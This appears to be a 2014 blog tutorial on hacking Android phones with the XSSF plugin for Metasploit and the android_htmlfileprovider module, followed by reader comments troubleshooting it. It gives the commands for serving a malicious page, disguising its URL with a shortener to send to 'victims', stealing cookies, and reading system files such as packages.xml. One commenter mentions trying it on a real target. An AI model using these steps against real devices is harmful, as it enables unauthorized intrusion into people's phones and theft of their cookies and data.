Android Phone Hacking via XSSF & Using Content Provider File Exploit

Posted on Updated on

This article is about ; how we can hack android phones. We use;
XSSF  and android exploit (in the metasploit framework). Therefore we use Kali Linux.

My test phone is ; Virtual Device / Android 2.3.3 Emulator on Linux
My test computer is ; Virtual Machine (WMware_Mobisec 1.1)

Here we go;

Firstly we must install XSSF on the Kali Linux. Open the terminal and follow the commands.

msfupdate
cd /opt/metasploit/apps/pro/msf3
svn export http://xssf.googlecode.com/svn/trunk ./ --force

It’s done. Now we can use xssf tool. Open the xssf … ;

msfconsole
load xssf Port=80 Uri=/xssf/ Public=true Mode=Verbose

Capture1

Let see all xssf urls;

xssf_urls

Capture2

Open xssfgui in Iceweasel(Web Browser)… (copy xssf logs page adress and paste to web browser )
My xssf logs page ;

192.168.116.133:81/xssf/gui.html?guipage=main

Capture3

Send url to victim. (option; you can hide url with noip,free dns,tinyurl… etc)

My test url;

192.168.116.133:80/xssf/test.html

My short url (from shorturl.com)

http://alturl.com/2m9ep

I send this adress to victims. After that;

Capture4

Check the terminal;

Capture5

Lets see all connected victims.

xssf_victims

Capture6

And, show information about victims.

xssf_information [victim_number]

Capture7

Search auxiliary/xssf …

Capture8

After, refresh the web browser.

Capture9

Modules works with android:

use auxiliary/xssf/public/misc/cookie
use auxiliary/xssf/public/misc/alert
use auxiliary/xssf/public/misc/check_connected
use auxiliary/xssf/public/misc/get_page
use auxiliary/xssf/public/misc/redirect

select this one. After;

#run
#Ctrl+C
#back

If you are using to cookie stuff ;

use auxiliary/xssf/public/misc/cookie

Capture12

Refresh the web browser and select the options. (Firstly Victim select, secondly attack…)

Capture11

Don’t press the download button. Just wait 😉

We can use alert option.

use auxiliary/xssf/public/misc/alert

Capture13

After alert;

Capture14

Check the connections & accounts . Firstly server must be stopped (Ctrl+C).

Capture15

Capture17

Now! android phone exploit
use module:

use auxiliary/gather/android_htmlfileprovider

Set the options;

Capture18

My local ip:

http://192.168.116.133:80

Short url:

alturl.com/m9u8e

After download…

Capture19

Capture20

If opened this file…

Capture19.5

Done!

We have a lot information.

Capture21

Now you can read all system data through

/proc/version-read android version
/proc/self/status-read all system & user process
/data/system/packages.xml

Packages.xml contain all installed system&user apk .
Also;
You can save all data to some txt file for further analysis…

The remainder is your imagination.

Check your downloads 🙂

Advertisements

7 thoughts on “Android Phone Hacking via XSSF & Using Content Provider File Exploit

    yamoulyss said:
    06 July 2014 at 04:31

    cant load it and I got this message Failed to load plugin from /opt/metasploit/msf3/plugins/xssf: cannot load such file — /opt/metasploit/msf3/plugins/xssf

    please any idea

      yamoulyss said:
      06 July 2014 at 04:32

      Shall I change the path of xssf?

        yamoulyss said:
        06 July 2014 at 04:48

        Yes, of course it was the path, just change it and it works 😉

    yamoulyss said:
    10 July 2014 at 03:39

    Hello,
    I got an error when I tried android_htmlfileprovider, it seems that the port 80 is used by another application so i changed to 8080, the problem is the target couldn’t load the html page (the requested file was not found). I am using BT5v3.
    please any help

      uceka responded:
      22 July 2014 at 15:30

      Hello sorry i’m late :/
      Maybe your port(8080) used for proxy or caching server ? i don’t get any error on the kali, you can try on the kali 🙂

        yamoulyss said:
        24 July 2014 at 05:51

        thank you for your reply.
        I changed my vm to kali and I tried different ports and every time it shows me the html file is downloaded however, when i tried to open it (with html viewer) doesn’t work!!!!!!!! in kali, it shows : payload is sending…. so its waiting for the page to be opened. 😦
        I’m thinking to tried in real target

        uceka responded:
        24 July 2014 at 09:49

        you can try on the different browser, like dolphin browser (https://play.google.com/store/apps/details?id=mobi.mgeek.TunnyBrowser). i guess, i tried on the dolphin.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s